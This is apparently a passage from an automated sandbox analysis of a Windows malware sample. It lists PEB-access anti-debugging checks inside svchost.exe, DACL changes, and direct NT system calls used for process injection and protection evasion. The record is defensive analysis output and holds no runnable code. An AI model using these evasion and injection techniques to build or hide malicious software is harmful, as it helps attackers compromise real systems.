Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h] 2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h] 2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h] 2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h] 2_2_02F6E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h] 2_2_02F32582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h] 2_2_02F32582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h] 2_2_02F64588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h] 2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h] 2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h] 2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h] 2_2_02F38550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h] 2_2_02F38550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h] 2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h] 2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h] 2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h] 2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h] 2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h] 2_2_02FC6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004B00 mov eax, dword ptr fs:[00000030h] 2_2_03004B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h] 2_2_02F6AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h] 2_2_02F6AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h] 2_2_02F30AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h] 2_2_02F64AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h] 2_2_02F64AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h] 2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h] 2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h] 2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h] 2_2_02F38AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h] 2_2_02F38AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h] 2_2_03002B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h] 2_2_03002B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h] 2_2_03002B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h] 2_2_03002B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h] 2_2_02F86AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h] 2_2_02F68A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h] 2_2_02FACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h] 2_2_02FACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h] 2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h] 2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h] 2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDEA60 mov eax, dword ptr fs:[00000030h] 2_2_02FDEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] 2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h] 2_2_02F40A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h] 2_2_02F40A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h] 2_2_02F54A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h] 2_2_02F54A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h] 2_2_02F6CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h] 2_2_02F6CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h] 2_2_02F5EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h] 2_2_02FBCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h] 2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h] 2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h] 2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h] 2_2_02F5EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h] 2_2_02FBCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h] 2_2_02FDEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h] 2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h] 2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h] 2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h] 2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h] 2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h] 2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h] 2_2_02F40BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h] 2_2_02F40BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h] 2_2_02FE4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h] 2_2_02FE4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h] 2_2_03004A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h] 2_2_02F2CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F28B50 mov eax, dword ptr fs:[00000030h] 2_2_02F28B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDEB50 mov eax, dword ptr fs:[00000030h] 2_2_02FDEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h] 2_2_02FE4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h] 2_2_02FE4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h] 2_2_02FC6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h] 2_2_02FC6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h] 2_2_02FFAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h] 2_2_02FD8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h] 2_2_02F5EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h] 2_2_02F5EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h] 2_2_02FF8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h] 2_2_02FF8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h] 2_2_02F6C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h] 2_2_02F6C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h] 2_2_02FFA8E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h] 2_2_02F5E8C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004940 mov eax, dword ptr fs:[00000030h] 2_2_03004940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h] 2_2_02FBC89D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h] 2_2_02F30887
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h] 2_2_02FBE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h] 2_2_02FBE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h] 2_2_02FC6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h] 2_2_02FC6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h] 2_2_02F60854
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h] 2_2_02F34859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h] 2_2_02F34859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h] 2_2_02F42840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h] 2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h] 2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h] 2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h] 2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h] 2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h] 2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h] 2_2_02F6A830
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h] 2_2_02FD483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h] 2_2_02FD483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h] 2_2_02FBC810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h] 2_2_02F629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h] 2_2_02F629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h] 2_2_02FBE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h] 2_2_02F649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h] 2_2_02FFA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h] 2_2_02FC69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h] 2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h] 2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h] 2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h] 2_2_02F309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h] 2_2_02F309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h] 2_2_02FD4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h] 2_2_02FD4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h] 2_2_02FBC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h] 2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h] 2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h] 2_2_02F56962
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 1_2_008681F7
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0083A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0083A395
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0083A364 SetUnhandledExceptionFilter, 1_2_0083A364

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtResumeThread: Direct from: 0x773836AC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtMapViewOfSection: Direct from: 0x77382D1C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtWriteVirtualMemory: Direct from: 0x77382E3C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtProtectVirtualMemory: Direct from: 0x77382F9C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtSetInformationThread: Direct from: 0x773763F9 Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtCreateMutant: Direct from: 0x773835CC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtNotifyChangeKey: Direct from: 0x77383C2C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtSetInformationProcess: Direct from: 0x77382C5C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtCreateUserProcess: Direct from: 0x7738371C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtQueryInformationProcess: Direct from: 0x77382C26 Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtResumeThread: Direct from: 0x77382FBC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtWriteVirtualMemory: Direct from: 0x7738490C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtOpenKeyEx: Direct from: 0x77383C9C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtReadFile: Direct from: 0x77382ADC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtDelayExecution: Direct from: 0x77382DDC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtQuerySystemInformation: Direct from: 0x77382DFC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtOpenSection: Direct from: 0x77382E0C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtQuerySystemInformation: Direct from: 0x773848CC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtReadVirtualMemory: Direct from: 0x77382E8C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtCreateKey: Direct from: 0x77382C6C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtClose: Direct from: 0x77382B6C
